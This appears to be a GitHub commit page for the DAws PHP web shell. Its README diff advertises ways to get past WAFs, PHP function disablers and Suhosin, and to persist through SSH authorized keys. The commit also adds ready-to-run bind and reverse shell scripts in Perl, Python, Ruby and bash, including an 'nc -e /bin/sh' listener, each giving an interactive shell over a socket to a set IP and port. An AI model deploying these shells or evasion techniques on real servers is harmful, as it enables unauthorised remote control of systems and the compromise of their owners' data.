-
Notifications
You must be signed in to change notification settings - Fork 194
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
8bf806c
commit 6e39e95
Showing
36 changed files
with
35,794 additions
and
3,256 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,58 +1,22 @@ | ||
| Hello everyone, | ||
|
|
||
|  | ||
|  | ||
|
|
||
| ###About | ||
|
|
||
| There's multiple things that makes DAws better than every Web Shell out there: | ||
|
|
||
| 1. Supports CGI by dropping Bash Shells (for Linux) and Batch Shells (for Windows). | ||
| 1. Bypasses WAFs, Disablers and Protection Systems; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell. (Yes, it bypasses Suhosin too) | ||
| 1. Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR(Randomized key for every session) + Base64(We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there. | ||
| 1. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier. | ||
| 1. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example. | ||
| 1. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know. | ||
| 1. Bypasses Security Systems using various methods. | ||
| 1. Drops CGI Shells and communicate with them to bypass Security Systems. | ||
| 1. Uses the SSH Authorized Keys method to bypass Security Systems. | ||
| 1. Is completely Post Based and uses a XOR Encryption based on a random key that gets generated with every new session + private base64 functions to bypass Security Systems. | ||
| 1. Supports Windows and Linux. | ||
| 1. Openned Source. | ||
|
|
||
| ######Extra Info | ||
| <ul> | ||
| <li>Directory Romaing:</li> | ||
| <ul> | ||
| <li>DAws checks, within the `web` directory, for a Writable and Readable Directory which will then be used to Drop and Execute needed scripts which will guarantee their success.</li> | ||
| </ul> | ||
| <li>Eval Form:</li> | ||
| <ul> | ||
| <li>`include`, `include_once`, `require` or `require_once` are being used instead PHP `eval` to bypass Protection Systems.</li> | ||
| </ul> | ||
| <li>Download from Link - Methods:</li> | ||
| <ul> | ||
| <li>PHP Curl</li> | ||
| <li>File_put_content</li> | ||
| </ul> | ||
| <li>Zip - Methods:</li> | ||
| <ul> | ||
| <li>Linux:</li> | ||
| <ul> | ||
| <li>Zip</li> | ||
| </ul> | ||
| <li>Windows:</li> | ||
| <ul> | ||
| <li>Vbs Script</li> | ||
| </ul> | ||
| </ul> | ||
| <li>Shells and Tools:</li> | ||
| <ul> | ||
| <li>Extra:</li> | ||
| <ul> | ||
| <li>`nohup`, if installed, is automatically used for background processing.</li> | ||
| </ul> | ||
| </ul> | ||
| </ul> | ||
|
|
||
| ###Updates: | ||
| DAws is always getting updated, I guess that's enough for this part Lol. | ||
| 1. Find a writeable and readable directory and moves there if it's a web directory. | ||
| 1. Drops a php.ini and a .htaccess file that clears all disablers incase "suphp" was installed. | ||
| 1. Has an advanced File Manager | ||
| 1. Mostly everything is done automatically (when it comes to command or script execution) | ||
| 1. Open Source | ||
| 1. and much more (check the source for more information; everything is well commented) | ||
|
|
||
| ###Credits: | ||
| 1. [dotcppfile](https://twitter.com/dotcppfile) | ||
| 2. [Aces](https://twitter.com/__A_C_E_S__) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| use Socket; | ||
|
|
||
| $port=4444; | ||
|
|
||
| socket(SERVER, AF_INET, SOCK_STREAM, getprotobyname('tcp')); | ||
|
|
||
| if(bind(SERVER, sockaddr_in($port, inet_aton("127.0.0.1")))) | ||
| { | ||
| listen(SERVER,10); | ||
| accept(CLIENT,SERVER); | ||
|
|
||
| open(STDIN,">&CLIENT"); | ||
| open(STDOUT,">&CLIENT"); | ||
| open(STDERR,">&CLIENT"); | ||
| exec("/bin/sh -i"); | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| import socket, subprocess, os | ||
|
|
||
| port=4444 | ||
|
|
||
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
| s.bind(("127.0.0.1", port)) | ||
| s.listen(5) | ||
|
|
||
| conn, addr = s.accept() | ||
|
|
||
| os.dup2(conn.fileno(),0) | ||
| os.dup2(conn.fileno(),1) | ||
| os.dup2(conn.fileno(),2) | ||
|
|
||
| p = subprocess.call(["/bin/sh", "-i"]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| require 'socket' | ||
|
|
||
| port=4444 | ||
|
|
||
| server = TCPServer.new port | ||
| client = server.accept | ||
|
|
||
| exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",client,client,client) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| require 'socket' | ||
|
|
||
| port=4444 | ||
|
|
||
| server = TCPServer.new port | ||
| client = server.accept | ||
|
|
||
| exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",client,client,client) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| port=4444 | ||
|
|
||
| nc -lvp $port -e /bin/sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,5 @@ | ||
| ip="127.0.0.1" | ||
| port=4444 | ||
|
|
||
| exec 5<>/dev/tcp/$ip/$port | ||
| cat <&5 | while read line; do $line 2>&5 >&5; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| use Socket; | ||
|
|
||
| $ip="127.0.0.1"; | ||
| $port=4444; | ||
|
|
||
| socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp")); | ||
|
|
||
| if(connect(S, sockaddr_in($port, inet_aton($ip)))) | ||
| { | ||
| open(STDIN,">&S"); | ||
| open(STDOUT,">&S"); | ||
| open(STDERR,">&S"); | ||
| exec("/bin/sh -i"); | ||
| }; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| use Socket; | ||
|
|
||
| $ip="127.0.0.1"; | ||
| $port=4444; | ||
|
|
||
| socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp")); | ||
|
|
||
| if(connect(S, sockaddr_in($port, inet_aton($ip)))) | ||
| { | ||
| open(STDIN,">&S"); | ||
| open(STDOUT,">&S"); | ||
| open(STDERR,">&S"); | ||
| exec("/bin/sh -i"); | ||
| }; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| import socket, subprocess, os | ||
|
|
||
| ip="127.0.0.1" | ||
| port=4444 | ||
|
|
||
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
| s.connect((ip, port)) | ||
|
|
||
| os.dup2(s.fileno(),0) | ||
| os.dup2(s.fileno(),1) | ||
| os.dup2(s.fileno(),2) | ||
|
|
||
| p = subprocess.call(["/bin/sh", "-i"]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,7 @@ | ||
| require 'socket' | ||
|
|
||
| ip="127.0.0.1" | ||
| port=4444 | ||
|
|
||
| f = TCPSocket.open(ip, port) | ||
| exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,7 @@ | ||
| require 'socket' | ||
|
|
||
| ip="127.0.0.1" | ||
| port=4444 | ||
|
|
||
| f = TCPSocket.open(ip, port) | ||
| exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f) |
Oops, something went wrong.